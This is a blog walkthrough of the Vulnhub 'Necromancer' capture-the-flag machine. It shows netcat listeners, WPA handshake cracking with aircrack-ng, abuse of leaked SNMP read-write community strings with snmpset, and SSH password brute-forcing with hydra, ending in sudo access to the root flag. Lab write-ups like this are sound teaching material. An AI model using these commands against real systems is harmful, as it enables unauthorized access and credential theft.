Necromancer | [Vulnhub walkthrough]

Anant Chauhan
7 min read · Aug 25, 2020


So here I am with a new machine named “Necromancer”. The difficulty level is EASY and the box has a total of 11 flags to find. Let’s start with enumeration.

nmap

nmap -n <IP>

nmap -sC -A -T5 <IP>

nmap -Pn <IP>

Well, I ran a number of nmap scans but found nothing; every time it reported that no port was open. So I opened Wireshark to see whether any handshakes or requests were happening.

wireshark

And look: the VM is trying to open a TCP connection to our machine on port 4444. So let’s start listening on port 4444.

nc -vv -lp 4444

netcat

Here we go, we received a big blob that looks like base64, so let’s try to decode it.

echo "encoded_string" | base64 -d

decode from base64 | FLAG 1

Correct! It is base64, and the last line says we have to chant the string of flag1 at port 666. The string inside the flag looks like an MD5 hash (you can confirm that with hash-identifier). MD5 cannot be reversed, so look the hash up in an online hash database first, then send the result to port 666.

The hash corresponds to “opensesame”. Now chant it at port 666.

echo "opensesame" | nc -u <IP> 666

FLAG 2
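The flags on this box all follow the same pattern: a base64 blob from netcat that decodes to a message holding flagN{md5-hex} plus a hint about the next port, and the "decode" of the hash is really hashing a guess and comparing. The helper below, an added example and not code from the original post, automates exactly that on a constructed sample message (the hash in it is computed locally, not a real flag from the box):

```python
import base64
import hashlib
import re

# Constructed sample in the shape the box uses: a base64 blob that decodes
# to a message carrying flagN{md5-hex} and a hint about the next port.
# The digest here is computed locally; it is NOT one of the box's real flags.
_MESSAGE = (
    "Welcome, traveller.\n"
    "Chant the string found in flag1 at the door on port 666.\n"
    "flag1{%s}\n" % hashlib.md5(b"opensesame").hexdigest()
)
SAMPLE_B64 = base64.b64encode(_MESSAGE.encode()).decode()

FLAG_RE = re.compile(r"flag(\d+)\{([0-9a-f]{32})\}")
PORT_RE = re.compile(r"\bport\s+(\d{1,5})\b", re.IGNORECASE)


def decode_payload(b64_text: str) -> str:
    """Join wrapped netcat output lines and base64-decode the blob."""
    cleaned = "".join(b64_text.split())
    return base64.b64decode(cleaned).decode(errors="replace")


def extract_flags(text: str) -> dict:
    """Map flag number -> 32-hex digest found in the decoded message."""
    return {int(n): h for n, h in FLAG_RE.findall(text)}


def extract_port_hint(text: str):
    """Return the first 'port N' hint in the message, or None."""
    m = PORT_RE.search(text)
    return int(m.group(1)) if m else None


def matches_md5(digest: str, candidate: str) -> bool:
    """MD5 is not decoded: a guessed plaintext is hashed and compared."""
    return hashlib.md5(candidate.encode()).hexdigest() == digest.lower()


def analyse(b64_text: str) -> dict:
    """Decode one captured blob into its flags and the hinted port."""
    text = decode_payload(b64_text)
    return {"flags": extract_flags(text), "port": extract_port_hint(text)}


if __name__ == "__main__":
    result = analyse(SAMPLE_B64)
    print(result)
    print("opensesame matches flag1:", matches_md5(result["flags"][1], "opensesame"))
```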

We got the 2nd flag, and as you can see in the third-to-last line it says “formation looks like the numeral 80”. I think port 80 (HTTP) is open now, let’s check!

There is a photo and a poem. I downloaded the photo to see whether I could get anything out of it.

I ran binwalk on the photo and got an extracted directory (_pileoffeathers.jpg.extracted). Inside it is one more file, feathers.txt, which is our flag3. It is also base64, so decode it and we get a directory (/amagicbridgeappearsatthechasm) on the HTTP server. Let’s explore further.

Another photo. Download it and check what is inside.

Well, I got nothing from this file :( … At that point I had no idea what to do, so I ran dirb to check for hidden directories.

dirb <url> <wordlists_path>

dirb

Damn it XD! A hidden file named “talisman”, let’s check it.

It’s a downloadable file. Download it and check what it is: `file` reports a 32-bit LSB executable. Give it execute permission and run it.

chmod +x <file_name>

Uhhhh! Nothing useful from running it, so I loaded it in a debugger to see what I could find.

gdb <file_name>

(gdb) info functions

Okay, so a function named “wearTalisman” is the one that runs, and below it there is another function named “chantToBreakSpell”. That is probably the function that gives us our next flag, so let’s break on the first and jump straight to the second:

break WearTalisman

run

jump chantToBreakSpell

Gotchaaa! We got our 4th flag, NICE! Now we have to chant the string at port 31337, so look up the hash.

The hash corresponds to “blackmagic”. Now chant it at port 31337 (UDP):

echo “blackmagic” | nc -u <IP> <PORT>

Okay! The response gives one more directory along with flag5.

/thenecromancerwillabsorboursoul directory

Got another picture with flag6. At the end a hint is given for port number 161, and there is a file named necromancer. Download it and check it.

The file is bzip2-compressed; decompressing it yields a tar archive, which in turn contains the final file “necromancer.cap”, a packet capture. So open this file in Wireshark.

wireshark

After checking, I found 802.11 traffic with a WPA handshake in it. I tried to crack it with aircrack-ng and the rockyou wordlist:

aircrack-ng <file_name> -w /usr/share/wordlists/rockyou.txt

We got the key → “death2all”. As we saw previously, we have to chant this at port 161.

infinity@kali:~$ nc -uv 10.0.2.13 161

10.0.2.13: inverse host lookup failed: Unknown host

(UNKNOWN) [10.0.2.13] 161 (snmp) open

death2all

Okay! Port 161 is SNMP, so I ran snmpwalk with the previous password “death2all” as the community string.

infinity@kali:~$ snmpwalk -v 2c -c death2all 10.0.2.13

Created directory: /var/lib/snmp/mib_indexes

iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”

iso.3.6.1.2.1.1.4.0 = STRING: “The door is Locked. If you choose to defeat me, the door must be Unlocked.”

iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”

iso.3.6.1.2.1.1.6.0 = STRING: “Locked — death2allrw!”

iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

I guess we have to unlock the door. iso.3.6.1.2.1.1.6.0 says it is locked and leaks a second community string, “death2allrw”, which looks like a read-write one. Let’s use it to change that MIB value.

infinity@kali:~$ snmpset -v 2c -c death2allrw 10.0.2.13 iso.3.6.1.2.1.1.6.0 s "Unlocked"

iso.3.6.1.2.1.1.6.0 = STRING: “Unlocked”

infinity@kali:~$ snmpwalk -v 2c -c death2all 10.0.2.13

iso.3.6.1.2.1.1.1.0 = STRING: “You stand in front of a door.”

iso.3.6.1.2.1.1.4.0 = STRING: “The door is unlocked! You may now enter the Necromancer’s lair!”

iso.3.6.1.2.1.1.5.0 = STRING: “Fear the Necromancer!”

iso.3.6.1.2.1.1.6.0 = STRING: “flag7{9e5494108d10bbd5f9e7ae52239546c4} — t22”

iso.3.6.1.2.1.1.6.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

Got it: flag7 points to port 22, which is SSH. Looking up the MD5 hash gives “demonslayer”, which looks like an SSH username. And the password?

Time for hydra B-) …

hydra -l demonslayer -P /usr/share/wordlists/rockyou.txt ssh://10.0.2.13

Huuhhhh! The password is “12345678”, very strong password XD XD XD…

Okay, when you log in over SSH you are greeted with some Necromancer ASCII art, COOOL!!! Let’s check further.

Found flag8.txt. At the end it says “Defend yourself! counter attack the Necromancer’s spells at u777”. I tried connecting to UDP 777 from my own machine but got no response, so finally I did it from localhost on the box itself, and we got a TEST (-_-) of three questions. They are easy and you can Google them; you also get a flag for every question.

In the last line you can see there is a hint that there is a small vile. Let’s search for where it is.

locate vile

Got the directory /home/demonslayer/.smallvile. Change into it.

The last flag is still not found, so just try reading it as root:

sudo cat /root/flag11.txt

Voilaaaa!!!! We got the last flag. Looking up this hash gives “hackergod”.

Okay!!!!! An interesting and easy/basic box. I liked it, and the art too!!!!!

*HAPPY HACKING*

infinity@kali:~$ shutdown
